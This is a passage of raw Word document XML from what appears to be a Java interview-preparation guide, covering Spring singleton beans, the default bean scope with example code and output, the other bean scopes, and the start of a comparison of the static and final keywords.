    </w:p>
    <w:p w14:paraId="30677406"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDAC9F2"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ingletonBean {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6382127E"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ingleton bean in Spring context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100C53DA"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showMessage() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F99123"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Hello from Singleton Bean in Spring!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5841B55E"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BD7C631"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FDB26FB" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25735BA7"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figuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558FE1CB"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AppConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD61792"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Defining the singleton bean in Spring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F52E1F4"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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B32409"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ingletonBean singletonBean() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087A314F"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new SingletonBean();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C2547A"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42FAFAE"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4735425"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Spring, the Singleton pattern ensures that only one instance of the bean is created for the entire Spring context, making it an easy way to implement shared services like database connections, configuration settings, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476FD02E" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27924C27" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51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ustom Singleton implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is useful when you need to control how and when your class instances are created, as in the case of database connections, logging, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32804D09" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51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pring's Singleton Beans</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> offer a more automatic and convenient approach, where Spring takes care of the bean lifecycle, and you can simply define beans and their dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F181613" w14:textId="77777777" w:rsidR="00262B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00262B80" w:rsidP="00A37CF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pending on the use case, you can choose the most appropriate Singleton implementation method to ensure your code is efficient, thread-safe, and maintainable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC22265" w14:textId="6906E899"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CD596CC">
          <v:rect id="_x0000_i1227" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F2066D" w14:textId="689DA590" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="0039480A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc196307562"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the default scope of beans</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w14:paraId="1F4D4BE0" w14:textId="37976C3C" w:rsidR="00F94A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00F94A76" w:rsidP="0028064B">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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the default scope of beans is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73649E5F" w14:textId="77777777" w:rsidR="00F94A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00F94A76"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fault Bean Scope - Singleton</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761CA615" w14:textId="77777777" w:rsidR="00F94A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00F94A76" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51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ingleton scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> means that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring will create only one instance of the bean</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and that single instance will be shared across the entire Spring container (i.e., across the entire application).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441C7255" w14:textId="77777777" w:rsidR="00F94A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00F94A76" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51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is the default scope, meaning if you don't explicitly specify a scope for a bean, Spring will treat it as a singleton.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125B06B7" w14:textId="77777777" w:rsidR="00F94A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00F94A76"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ow It Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491D5A2B" w14:textId="77777777" w:rsidR="00F94A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00F94A76" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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the Spring container is initialized, a single instance of the bean is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06190C99" w14:textId="77777777" w:rsidR="00F94A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00F94A76" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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l requests for that bean will return the same instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A050F6B" w14:textId="77777777" w:rsidR="00F94A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00F94A76" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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bean is created only once, regardless of how many times it is requested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2D3A6F" w14:textId="77777777" w:rsidR="00F94A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00F94A76"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Singleton Bean in Spring (Default):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0527A7DE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5FA6B8"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ySingletonBean {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398BCE17"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MySingletonBean() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436E1BC0"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ingleton Bean Instance Created");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722B74F5"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832BD8A" w14:textId="77777777" w:rsidR="00F94A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00F94A76" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D9E0537"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printMessage() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523ADDA8"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Hello from Singleton Bean!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3756453B"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3AAC20D"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8E3297D" w14:textId="77777777" w:rsidR="00F94A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00F94A76"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ccessing the Singleton Bean:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBB862A"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figuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E16C65C"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Scan(basePackages = "com.example") // This will scan and register beans in the given package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC48DBD"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AppConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217E6F18"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A78A09F" w14:textId="77777777" w:rsidR="00F94A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00F94A76" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50B6B061"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App {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B99510F"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13C75B6F"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pplicationContext context = new AnnotationConfigApplicationContext(AppConfig.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620B6087"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9830584"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SingletonBean bean1 = context.getBean(MySingletonBean.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62777710"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bean1.printMessage();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1F800D"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F802106"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SingletonBean bean2 = context.getBean(MySingletonBean.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717FED1F"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bean2.printMessage();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B8A789"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E00148C"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bean1 == bean2);  // This will print "true" because both are the same instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142140A3"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AB977C4"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8349025" w14:textId="77777777" w:rsidR="00F94A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00F94A76"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p w14:paraId="338A8B2C"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gleton Bean Instance Created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6509E582"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llo from Singleton Bean!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B693DA"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llo from Singleton Bean!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4252F40D"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ue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0369791C"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ere, bean1 and bean2 are pointing to the same instance, which confirms the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>singleton scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0057C73F" w14:textId="77777777" w:rsidR="00F94A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00F94A76"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Other Bean Scopes in Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42836579"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ile </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the default scope, Spring provides other bean scopes that can be explicitly defined. These include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D8A588" w14:textId="77777777" w:rsidR="00F94A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00F94A76" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ototype</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A new instance of the bean is created every time it is requested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23531AB7" w14:textId="77777777" w:rsidR="00F94A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00F94A76" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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cope("prototype")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46349CD2" w14:textId="77777777" w:rsidR="00F94A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00F94A76" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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quest</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A single bean is created per HTTP request. This scope is typically used in web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7102EC" w14:textId="77777777" w:rsidR="00F94A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00F94A76" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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cope("request")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698A0162" w14:textId="77777777" w:rsidR="00F94A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00F94A76" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ssion</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A single bean is created per HTTP session. Used in web applications for session-scoped beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E63EAEF" w14:textId="77777777" w:rsidR="00F94A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00F94A76" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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cope("session")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A38C6F7" w14:textId="77777777" w:rsidR="00F94A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00F94A76" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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GlobalSession</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A single bean is created per global HTTP session in portlet-based applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F35BA30" w14:textId="77777777" w:rsidR="00F94A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00F94A76" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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cope("globalSession")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B348FB8" w14:textId="77777777" w:rsidR="00F94A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00F94A76"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y default, unless specified otherwise, Spring beans are singleton-scoped. You can override this behavior with the @Scope annotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4DFACE" w14:textId="4EBB09DB" w:rsidR="00342FA5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0028064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CB67534">
          <v:rect id="_x0000_i1228" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3344F160" w14:textId="32B43D9D" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="0039480A" w:rsidP="001C0DAC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc196307563"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between static and final</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w14:paraId="24C3A10B" w14:textId="7C098AF1" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="009D6F7F">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keywords </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static</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final</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java are used for different purposes. Here’s a detailed explanation of both and their differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0005E8D5" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A"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static keyword:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC1F1F1" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to define class-level variables and methods, meaning they belong to the class rather than instances of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146B9E18" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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cope</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A static variable or method is shared by all instances of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9CC393" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C07DBD5" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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Variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: They are initialized once and shared by all objects of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148956EB" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: They can be invoked without creating an instance of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D8355B" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A"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4883E8E8"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MyClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078AE812"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atic int counter = 0; // Static variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F5C191" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D0FDF5F"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atic void incrementCounter() { // Static method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F9178D"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unter++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13096679"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AACF94F"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8E5453D" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E9DDA19"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Test {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C4DFF9"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63D14D10"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Class.incrementCounter();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F865772"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Class.incrementCounter();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD59B31"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MyClass.counter); // Outputs: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AF5423"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13B7212"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093EE96" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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this example, the counter variable is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
